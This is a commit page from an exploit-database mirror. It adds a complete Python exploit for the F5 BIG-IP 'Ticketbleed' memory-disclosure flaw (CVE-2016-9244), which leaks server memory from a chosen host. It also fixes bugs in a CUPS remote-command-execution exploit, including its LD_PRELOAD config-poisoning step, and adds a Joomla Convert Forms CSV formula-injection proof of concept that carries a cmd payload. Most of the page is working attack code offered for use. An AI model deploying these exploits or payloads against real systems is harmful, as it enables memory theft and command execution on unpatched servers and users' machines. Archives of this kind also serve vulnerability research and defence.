DB: 2018-04-13
3 changes to exploits/shellcodes F5 BIG-IP SSL Virtual Server - Memory Disclosure F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)
This commit is contained in:
parent
3339727aed
commit
a8b515dd6d
4 changed files with 194 additions and 6 deletions
152
exploits/hardware/remote/44446.py
Executable file
152
exploits/hardware/remote/44446.py
Executable file
|
@ -0,0 +1,152 @@
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
#!/usr/bin/python
|
||||||
|
# Exploit Title: Ticketbleed
|
||||||
|
# Google Dork: n/a
|
||||||
|
# Date: Exploit: 02/13/17, Advisory Published: 02/09/17
|
||||||
|
# Exploit Author: @0x00string
|
||||||
|
# Vendor Homepage: https://f5.com/
|
||||||
|
# Software Link: https://support.f5.com/csp/article/K05121675
|
||||||
|
# Version: see software link for versions
|
||||||
|
# Tested on: F5 BIGIP 11.6
|
||||||
|
# CVE : CVE-2016-9244
|
||||||
|
# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)
|
||||||
|
import re, getopt, sys, socket
|
||||||
|
from struct import *
|
||||||
|
try:
|
||||||
|
from scapy_ssl_tls.ssl_tls import *
|
||||||
|
except ImportError:
|
||||||
|
from scapy.layers.ssl_tls import *
|
||||||
|
|
||||||
|
def banner():
|
||||||
|
print '''
|
||||||
|
lol ty filippo!
|
||||||
|
ty tintinweb!
|
||||||
|
0000000000000
|
||||||
|
0000000000000000000 00
|
||||||
|
00000000000000000000000000000
|
||||||
|
0000000000000000000000000000000
|
||||||
|
000000000 0000000000
|
||||||
|
00000000 0000000000
|
||||||
|
0000000 000000000000
|
||||||
|
0000000 000000000000000
|
||||||
|
000000 000000000 000000
|
||||||
|
0000000 000000000 000000
|
||||||
|
000000 000000000 000000
|
||||||
|
000000 000000000 000000
|
||||||
|
000000 00000000 000000
|
||||||
|
000000 000000000 000000
|
||||||
|
0000000 000000000 0000000
|
||||||
|
000000 000000000 000000
|
||||||
|
0000000000000000 0000000
|
||||||
|
0000000000000 0000000
|
||||||
|
00000000000 00000000
|
||||||
|
00000000000 000000000
|
||||||
|
0000000000000000000000000000000
|
||||||
|
00000000000000000000000000000
|
||||||
|
000 0000000000000000000
|
||||||
|
0000000000000
|
||||||
|
@0x00string
|
||||||
|
https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py
|
||||||
|
'''
|
||||||
|
|
||||||
|
def usage ():
|
||||||
|
print ("python script.py <args>\n"
|
||||||
|
" -h, --help: Show this message\n"
|
||||||
|
" -a, --rhost: Target IP address\n"
|
||||||
|
" -b, --rport: Target port\n"
|
||||||
|
"\n\n"
|
||||||
|
"Examples:\n"
|
||||||
|
"python script.py -a 10.10.10.10 -b 443\n"
|
||||||
|
"python script.py --rhost 10.10.10.10 --rport 8443")
|
||||||
|
exit()
|
||||||
|
|
||||||
|
def pretty (t, m):
|
||||||
|
if (t is "+"):
|
||||||
|
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
|
||||||
|
elif (t is "-"):
|
||||||
|
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
|
||||||
|
elif (t is "*"):
|
||||||
|
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
|
||||||
|
elif (t is "!"):
|
||||||
|
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",
|
||||||
|
|
||||||
|
def createDump (input):
|
||||||
|
d, b, h = '', [], []
|
||||||
|
u = list(input)
|
||||||
|
for e in u:
|
||||||
|
h.append(e.encode("hex"))
|
||||||
|
if e == '0x0':
|
||||||
|
b.append('0')
|
||||||
|
elif 30 > ord(e) or ord(e) > 128:
|
||||||
|
b.append('.')
|
||||||
|
elif 30 < ord(e) or ord(e) < 128:
|
||||||
|
b.append(e)
|
||||||
|
|
||||||
|
i = 0
|
||||||
|
while i < len(h):
|
||||||
|
if (len(h) - i ) >= 16:
|
||||||
|
d += ' '.join(h[i:i+16])
|
||||||
|
d += " "
|
||||||
|
d += ' '.join(b[i:i+16])
|
||||||
|
d += "\n"
|
||||||
|
i = i + 16
|
||||||
|
else:
|
||||||
|
d += ' '.join(h[i:(len(h) - 0 )])
|
||||||
|
pad = len(' '.join(h[i:(len(h) - 0 )]))
|
||||||
|
d += ' ' * (56 - pad)
|
||||||
|
d += ' '.join(b[i:(len(h) - 0 )])
|
||||||
|
d += "\n"
|
||||||
|
i = i + len(h)
|
||||||
|
return d
|
||||||
|
|
||||||
|
def ticketBleed (rhost, rport):
|
||||||
|
h = (rhost,int(rport));
|
||||||
|
version = TLSVersion.TLS_1_2
|
||||||
|
secret = ""
|
||||||
|
session_ticket = ""
|
||||||
|
sid = ""
|
||||||
|
cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA
|
||||||
|
with TLSSocket(socket.socket(), client=True) as sock:
|
||||||
|
sock.connect(h)
|
||||||
|
ctx = sock.tls_ctx
|
||||||
|
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")])
|
||||||
|
sock.sendall(packet)
|
||||||
|
sock.recvall()
|
||||||
|
packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()
|
||||||
|
packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()
|
||||||
|
sock.sendall(TLS.from_records([packet_ke, packet_ccs]))
|
||||||
|
sock.sendall(to_raw(TLSFinished(), ctx))
|
||||||
|
ret = sock.recvall()
|
||||||
|
session_ticket = ret[TLSSessionTicket].ticket
|
||||||
|
secret = ctx.master_secret
|
||||||
|
#pretty("*", "ctx 1: \n" + str(ctx))
|
||||||
|
with TLSSocket(socket.socket(), client=True) as sock:
|
||||||
|
sock.connect(h)
|
||||||
|
ctx = sock.tls_ctx
|
||||||
|
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])
|
||||||
|
sock.tls_ctx.resume_session(secret)
|
||||||
|
sock.sendall(packet)
|
||||||
|
ret = sock.recvall()
|
||||||
|
sid = ret[TLSServerHello].session_id
|
||||||
|
#pretty("*", "ctx 2: \n" + str(ctx))
|
||||||
|
pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid))
|
||||||
|
|
||||||
|
def main():
|
||||||
|
rhost = None;
|
||||||
|
rport = None;
|
||||||
|
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])
|
||||||
|
for opt, arg in options:
|
||||||
|
if opt in ('-h', '--help'):
|
||||||
|
usage()
|
||||||
|
elif opt in ('-a','--rhost'):
|
||||||
|
rhost = arg;
|
||||||
|
elif opt in ('-b','--rport'):
|
||||||
|
rport = arg;
|
||||||
|
banner()
|
||||||
|
if rhost is None or rport is None:
|
||||||
|
usage()
|
||||||
|
ticketBleed(rhost,rport)
|
||||||
|
exit(0);
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
|
@ -40,7 +40,7 @@ def banner():
|
||||||
000 0000000000000000000
|
000 0000000000000000000
|
||||||
0000000000000
|
0000000000000
|
||||||
@0x00string
|
@0x00string
|
||||||
github.com/0x00string/oldays/CVE-2015-1158.py
|
https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py
|
||||||
'''
|
'''
|
||||||
|
|
||||||
def usage ():
|
def usage ():
|
||||||
|
@ -140,10 +140,13 @@ def locatePrinters(rhost, rport="631"):
|
||||||
if m is not None:
|
if m is not None:
|
||||||
printer = m.group(1)
|
printer = m.group(1)
|
||||||
pretty("+","printer found: " + printer)
|
pretty("+","printer found: " + printer)
|
||||||
|
return printer
|
||||||
|
else:
|
||||||
|
pretty("-","no printers")
|
||||||
|
exit(1)
|
||||||
else:
|
else:
|
||||||
pretty("-","no printers")
|
pretty("-","no printers")
|
||||||
exit(1)
|
exit(1)
|
||||||
return printer
|
|
||||||
|
|
||||||
def preparePayload(libpath):
|
def preparePayload(libpath):
|
||||||
with open(libpath, 'rb') as f:
|
with open(libpath, 'rb') as f:
|
||||||
|
@ -226,7 +229,7 @@ def seedTarget(rhost, rport, printer, payload):
|
||||||
"\x0d\x0a")
|
"\x0d\x0a")
|
||||||
|
|
||||||
sendJobRequest = http_header2 + send_document_packet
|
sendJobRequest = http_header2 + send_document_packet
|
||||||
blah2 = txrx("172.20.32.3",631,"tcp",sendJobRequest)
|
blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest)
|
||||||
pretty("*","\n" + createDump(blah) + "\n")
|
pretty("*","\n" + createDump(blah) + "\n")
|
||||||
pretty("*","job id: " + jobid)
|
pretty("*","job id: " + jobid)
|
||||||
return jobid
|
return jobid
|
||||||
|
@ -478,13 +481,14 @@ def putConfig(rhost, rport, config):
|
||||||
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))
|
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))
|
||||||
|
|
||||||
def poisonConfig(config, name):
|
def poisonConfig(config, name):
|
||||||
config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d00" + name + "-001\x0a"
|
config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d000" + name + "-001\x0a"
|
||||||
return config
|
return config
|
||||||
|
|
||||||
def main():
|
def main():
|
||||||
rhost = None;
|
rhost = None;
|
||||||
|
rport = None;
|
||||||
noshell = None;
|
noshell = None;
|
||||||
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])
|
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help'])
|
||||||
for opt, arg in options:
|
for opt, arg in options:
|
||||||
if opt in ('-h', '--help'):
|
if opt in ('-h', '--help'):
|
||||||
usage()
|
usage()
|
||||||
|
|
30
exploits/php/webapps/44447.txt
Normal file
30
exploits/php/webapps/44447.txt
Normal file
|
@ -0,0 +1,30 @@
|
||||||
|
# Exploit Title: Joomla Extension Convert Forms version 2.0.3 - Formula Injection (CSV Injection)
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 12-04-2018
|
||||||
|
################################
|
||||||
|
# Exploit Author: Jetty Sairam
|
||||||
|
################################
|
||||||
|
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
|
||||||
|
# Affected Version: 2.03 and before
|
||||||
|
#Category: Plugins and Extensions
|
||||||
|
# Tested on: WiN7_x64
|
||||||
|
# CVE : CVE-2018-10063
|
||||||
|
|
||||||
|
1. Application Description:
|
||||||
|
Convert Forms provides a framework to build custom forms for Joomla users.
|
||||||
|
|
||||||
|
2. Technical Description:
|
||||||
|
Custom Forms version 2.0.3 is affected by the vulnerability Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
|
||||||
|
|
||||||
|
3. Proof Of Concept:
|
||||||
|
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
|
||||||
|
When high privileged user logs into the application to export form data in CSV and opens the file.
|
||||||
|
Formula gets executed and calculator will get popped in his machine.
|
||||||
|
|
||||||
|
4. Solution:
|
||||||
|
Upgrade to version 2.0.4
|
||||||
|
https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
|
||||||
|
|
||||||
|
5. Reference:
|
||||||
|
https://www.tassos.gr/blog/convert-forms-2-0-4-security-release
|
||||||
|
https://vel.joomla.org/articles/2140-introducing-csv-injection
|
|
@ -16086,7 +16086,7 @@ id,file,description,date,author,type,platform,port
|
||||||
41233,exploits/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,remote,linux,
|
41233,exploits/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,remote,linux,
|
||||||
41236,exploits/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,remote,hardware,
|
41236,exploits/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,remote,hardware,
|
||||||
41297,exploits/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,remote,multiple,
|
41297,exploits/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,remote,multiple,
|
||||||
41298,exploits/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",remote,hardware,
|
41298,exploits/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-10,"Ege Balci",remote,hardware,
|
||||||
41358,exploits/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,remote,php,80
|
41358,exploits/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,remote,php,80
|
||||||
41366,exploits/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",remote,java,
|
41366,exploits/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",remote,java,
|
||||||
41436,exploits/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Remote Buffer Overflow (SEH)",2017-02-22,"Peter Baris",remote,windows,
|
41436,exploits/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Remote Buffer Overflow (SEH)",2017-02-22,"Peter Baris",remote,windows,
|
||||||
|
@ -16389,6 +16389,7 @@ id,file,description,date,author,type,platform,port
|
||||||
44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
|
44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
|
||||||
44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
|
44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
|
||||||
44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
|
44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
|
||||||
|
44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -39141,3 +39142,4 @@ id,file,description,date,author,type,platform,port
|
||||||
44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux,
|
44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux,
|
||||||
44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
|
44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
|
||||||
44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
|
44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
|
||||||
|
44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue